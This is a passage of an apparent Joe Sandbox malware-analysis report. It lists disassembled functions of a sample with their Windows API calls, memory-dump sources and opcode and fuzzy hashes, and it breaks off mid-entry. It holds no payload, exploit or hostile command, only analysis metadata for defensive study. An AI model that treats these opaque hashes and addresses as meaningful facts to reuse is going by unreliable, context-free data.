Instruction Fuzzy Hash: BAB21771E086298FEB65CE28DD447EABBB5FB48305F1545EAD84DA7240E734AEC18F40

Function 0050DB49 Relevance: 1.9, APIs: 1, Instructions: 408timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0050DF8E,00000000,00000000,00000000), ref: 0050DE4D

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: a0d11b23d85d02dd5effd511373deaab4f6f1c4049235492cb6822a141763406
Instruction ID: e8ae5ce0109ba20853376395be0ea07a4497e8d1cefaaa505ced403d2f0a1c9e
Opcode Fuzzy Hash: a0d11b23d85d02dd5effd511373deaab4f6f1c4049235492cb6822a141763406
Instruction Fuzzy Hash: BDC10672900226ABDB10AFE4DC06ABE7FB9FF54714F54405AF805A72C1E7709E41CBA4

Function 0050B28F Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0050B28A,?,?,00000008,?,?,0051D535,00000000), ref: 0050B4BC

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: d95afdee1711e651e67553c3dacf84fd2989952c517b98ed5f8de1692f47bdee
Instruction ID: f6c067f70b2198ff2f70752253d112b74204ad618552d23126357500e28e5fe5
Opcode Fuzzy Hash: d95afdee1711e651e67553c3dacf84fd2989952c517b98ed5f8de1692f47bdee
Instruction Fuzzy Hash: 79B12C31610609DFEB15CF28C4D6AA97FA1FF45364F258698E89ACF2E1C335E991CB40

Function 0050E877 Relevance: 1.7, APIs: 1, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca34718eaebacc8777af3afb359f4f7a749ff13bbcaf44b90dd6c6892ed92534
Instruction ID: 8cb67b757a7e8ca12083317ec3448587f21124b1805b67b19ddf7c5427a4b83f
Opcode Fuzzy Hash: ca34718eaebacc8777af3afb359f4f7a749ff13bbcaf44b90dd6c6892ed92534
Instruction Fuzzy Hash: A551EB76900219AFDB24DF79CC89AAEBBB9FF85304F24459DE409D3241E6319E458F50

Function 004C863C Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004C8652

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 734858be53be6ca7d6fde503fd3ad7b1ad1a8cb6ae705fd533472a3cd23e65b2
Instruction ID: 1e52c6bf4e84c184c85f644d3770e0cfcbf928ea82d976c493a04f762236fb54
Opcode Fuzzy Hash: 734858be53be6ca7d6fde503fd3ad7b1ad1a8cb6ae705fd533472a3cd23e65b2
Instruction Fuzzy Hash: 15519DB5A112098FEB18CF55E989BAAB7F0FB54310F24816EC401EB350E778E904CF64

Function 004F4615 Relevance: 1.6, Strings: 1, Instructions: 392COMMON

Download Yara Rule

Strings

0, xrefs: 004F47B9

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: cb9b5df74ac85791531afb3b4195b163e3c815b8a9dcfeebfb63601daf28c858
Instruction ID: 47fb1b217d2e69cb4961fb4305d062d3be95624c03572c61b9064c5379129670
Opcode Fuzzy Hash: cb9b5df74ac85791531afb3b4195b163e3c815b8a9dcfeebfb63601daf28c858
Instruction Fuzzy Hash: 02E1AD74A006098FDB24DF68C480A7FB7F1BF86314B24464ED656DB390DB38AD42CB5A

Function 004F4A45 Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

0, xrefs: 004F4BDA

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 794685f70a71965d77c17019f5d94fde0c8d7a7b15713bb5b6d9c5c42d71c7ae
Instruction ID: fd0894603cf5b5eb9f212c5fd046eda6be1885bee2d99a375e6888c70221c38e
Opcode Fuzzy Hash: 794685f70a71965d77c17019f5d94fde0c8d7a7b15713bb5b6d9c5c42d71c7ae
Instruction Fuzzy Hash: 0AE19D70A006098FCB24CF68C580ABBB7F1FF85314B24465ED6569B391DB38ED46CB5A

Function 004F308B Relevance: 1.6, Strings: 1, Instructions: 348COMMON

Download Yara Rule

Strings

0, xrefs: 004F3228

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 01a36693bd6d4248b30e925ae90e357f797623301bbbcf5a9767ed961e04bb70
Instruction ID: 6394fae7e18d8314e650c9467726b86706b5fc168e203f671607ca71e46dd37d
Opcode Fuzzy Hash: 01a36693bd6d4248b30e925ae90e357f797623301bbbcf5a9767ed961e04bb70
Instruction Fuzzy Hash: 73C1F270A0064E8FCB24CF68C5806BFBBB1AF05306F14465FDA5697391CB39AE46CB59

Function 00513162 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00504923: GetLastError.KERNEL32(?,?,004D64AA,005326E8,0000000C), ref: 00504927
Part of subcall function 00504923: SetLastError.KERNEL32(00000000), ref: 005049C9

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005131B6

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 971fdd08811fe0820d590a0c6afffb57e70933e46b99eefb85bd03da4e0cabd0
Instruction ID: e948578a61f9312badade637befcc20ac560f3419953816376ebf40ce2357501
Opcode Fuzzy Hash: 971fdd08811fe0820d590a0c6afffb57e70933e46b99eefb85bd03da4e0cabd0
Instruction Fuzzy Hash: 2A21C576644106ABEF28AB25DD56AFE7BA8FF44310B10007AFD11D7281EB74EE84CB50

Function 004F3B1B Relevance: 1.6, Strings: 1, Instructions: 326COMMON

Download Yara Rule

Strings

0, xrefs: 004F3CC2

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 04113b57cad77c840f474a7a6ab91fdcf9a2d0801d7117710a6807d0a4dcfe84
Instruction ID: 18f5647eafd5f8a4b357b3edd5a1174950b272b7d850bc9ee0f42a1482f81178
Opcode Fuzzy Hash: 04113b57cad77c840f474a7a6ab91fdcf9a2d0801d7117710a6807d0a4dcfe84
Instruction Fuzzy Hash: C7B1EF30A0064E8BCB24CFA9C590ABFB7B1EF44316F10451FD656AB391D738AE46CB59

Function 004F37B6 Relevance: 1.6, Strings: 1, Instructions: 322COMMON

Download Yara Rule

Strings

0, xrefs: 004F394E

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: cfbac408bac32c608a9dd3e4db34e8b68841e517003414f9559d70f96d4d5390
Instruction ID: 3582be41b897c5c46481fe12929c6972158492dd872210c7bb966eafc739b8ad
Opcode Fuzzy Hash: cfbac408bac32c608a9dd3e4db34e8b68841e517003414f9559d70f96d4d5390
Instruction Fuzzy Hash: 53B1F370A0060E8BCB24EF69C480ABFB7F1AF44745B10451FE696A7390D77CAE46CB59

Function 004F3E8F Relevance: 1.6, Strings: 1, Instructions: 322COMMON

Download Yara Rule

Strings

0, xrefs: 004F4027

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 3130ab474c8a8ba5b64aadc3ffa0bf10299e0d786ef641b384f11f8b13df6d61
Instruction ID: 1807eaba2cc3e402145af00b50be4355b42a03c943ef23c29d9545dfa2f2e3ee
Opcode Fuzzy Hash: 3130ab474c8a8ba5b64aadc3ffa0bf10299e0d786ef641b384f11f8b13df6d61
Instruction Fuzzy Hash: 66B1B130A0060E8ECB24CF69C5856BFB7F1AF84304B14451FE656A7390DA39AE86CB59

Function 004F265E Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 004F27F7

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 43ac4e2ec5c4460633492160b028729292481a98f94decb6e1ae9ad6989dbd09
Instruction ID: 9d9bba4c0fe939a85f4b79c97667a1be345e652414bf5e02b7f49932fefa5ddb
Opcode Fuzzy Hash: 43ac4e2ec5c4460633492160b028729292481a98f94decb6e1ae9ad6989dbd09
Instruction Fuzzy Hash: D5B1C370A0060E8BDB24EE64CA55ABFB7E1AF44304F14061FD652E7391D7BCAD42CB5A

Function 004F2316 Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

0, xrefs: 004F24A0

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9393bb74f29e61c120391a4c77aa282ede16ffae322c5bc2a98f65f651736c46
Instruction ID: 7d2c4013df8b764b2a23e79899c541d226bb1efb05356d6e092e91e93e5ca6a0
Opcode Fuzzy Hash: 9393bb74f29e61c120391a4c77aa282ede16ffae322c5bc2a98f65f651736c46
Instruction Fuzzy Hash: 9EB1E3B090060E9BCB24CE68C655ABFB7A5BB05304F14061FDB52E7391C7BCAD46CB5A

Function 004F29B5 Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

0, xrefs: 004F2B3F

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b25ab093ae065a62e5732e1f8f45476ec6a180d141dcd3403c326b83b3005173
Instruction ID: 392490c9b600334627ddb7bfd7eec55c16452d490c71d9e553135ca8aa917e40
Opcode Fuzzy Hash: b25ab093ae065a62e5732e1f8f45476ec6a180d141dcd3403c326b83b3005173
Instruction Fuzzy Hash: 1EB1B370900A4E8BCB35CF68CA956BFB7A5EB04314F14051FDB52A7391C7B8A942CB5A

Function 0050E27B Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0050E282

Part of subcall function 0051A618: OutputDebugStringW.KERNEL32(00000000,?,?,?,?), ref: 0051A66E

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: DebugDebuggerOutputPresentString
String ID:
API String ID: 4086329628-0
Opcode ID: aac3146c36d2b85fd72a39b507fc9f0a22e254c77cc5e7f94b4ab76739fc52af
Instruction ID: dc4d9f145519a3cc0d67cee951ffe792d5d2357da6a3be78f11c0b6f9165499f
Opcode Fuzzy Hash: aac3146c36d2b85fd72a39b507fc9f0a22e254c77cc5e7f94b4ab76739fc52af
Instruction Fuzzy Hash: C7F08C3510562B7BEF212AA18C0BBAF3F0DBF82364F380C10FD15D61C1DA21D9519AB6

Function 00513391 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00504923: GetLastError.KERNEL32(?,?,004D64AA,005326E8,0000000C), ref: 00504927
Part of subcall function 00504923: SetLastError.KERNEL32(00000000), ref: 005049C9

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0051312B,00000000,00000000,?), ref: 005133BD

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 69d1e12fc8f5ea1a37f5ca21998735ae3523a844b27638a9887317cd826bcacc
Instruction ID: f01deac63056606c6a1c61dd1a39acc9a52a9b92ce081221b2e60f7b4cbd60eb
Opcode Fuzzy Hash: 69d1e12fc8f5ea1a37f5ca21998735ae3523a844b27638a9887317cd826bcacc
Instruction Fuzzy Hash: 65F08636A00112ABEB28572488166FA7F6CFB40754F554928AD55A3180DE78FF81C695

Function 00512E84 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00504923: GetLastError.KERNEL32(?,?,004D64AA,005326E8,0000000C), ref: 00504927
Part of subcall function 00504923: SetLastError.KERNEL32(00000000), ref: 005049C9

EnumSystemLocalesW.KERNEL32(00513162,00000001,00000000,?,-00000050,?,00513504,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00512ECE

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 14089ab1abc1c5bbeec7a693f896d0173a0911621458de21505d5ca7f9d1bd94
Instruction ID: 41506f581f0e855f37a117247af71ac32de81a174da1e81bd39e87f9a0875501
Opcode Fuzzy Hash: 14089ab1abc1c5bbeec7a693f896d0173a0911621458de21505d5ca7f9d1bd94
Instruction Fuzzy Hash: B7F0F6362003086FEB245F79DC85ABB7F95FF80768F09452DFA454B680D6B19D92C650

Function 00504C2D Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004D8C3F: EnterCriticalSection.KERNEL32(?,?,00504167,?,00532C68,00000008,0050455A,?,?,?), ref: 004D8C4E

EnumSystemLocalesW.KERNEL32(00504C1A,00000001,00532CE8,0000000C,0050555C,00000000), ref: 00504C65

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: bc5be62a1cfa9a8c689e00e1cb3acba50dd4bbb57873eb2ce1dd51e611e84b38
Instruction ID: be19b44d5c2c85f97e7712dec1488cd57980460a83fa3eb8bcbca0da9df1b449
Opcode Fuzzy Hash: bc5be62a1cfa9a8c689e00e1cb3acba50dd4bbb57873eb2ce1dd51e611e84b38
Instruction Fuzzy Hash: 6CF03272A01304EFEB00EF98E846B9C7BB0FB48725F10412AE510AB2A0DB7969449F84

Function 004C72A6 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,004C4D29,00000000,?,00000004,004C3718,?,00000004,004C3D1F,00000000,00000000), ref: 004C72BF

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ad3bfa07d4508bd0cf3f7c581c78e7efdebb5b1070cc81c7c472196893515113
Instruction ID: 474695a589bfd58324c029063d07c681fa9ca8e84a52cf19498905773bef8d65
Opcode Fuzzy Hash: ad3bfa07d4508bd0cf3f7c581c78e7efdebb5b1070cc81c7c472196893515113
Instruction Fuzzy Hash: F5E09B36254100B7D7A58BBCAD1FF677798970174AF104187B102D52C1C568CB419559

Function 00512D80 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00504923: GetLastError.KERNEL32(?,?,004D64AA,005326E8,0000000C), ref: 00504927
Part of subcall function 00504923: SetLastError.KERNEL32(00000000), ref: 005049C9

EnumSystemLocalesW.KERNEL32(00512CD9,00000001,00000000,?,?,00513562,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00512DB7

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: c045d02fbf574329e985317a473110d2a5d318b044f62cbd5271d1beb1eaeb65
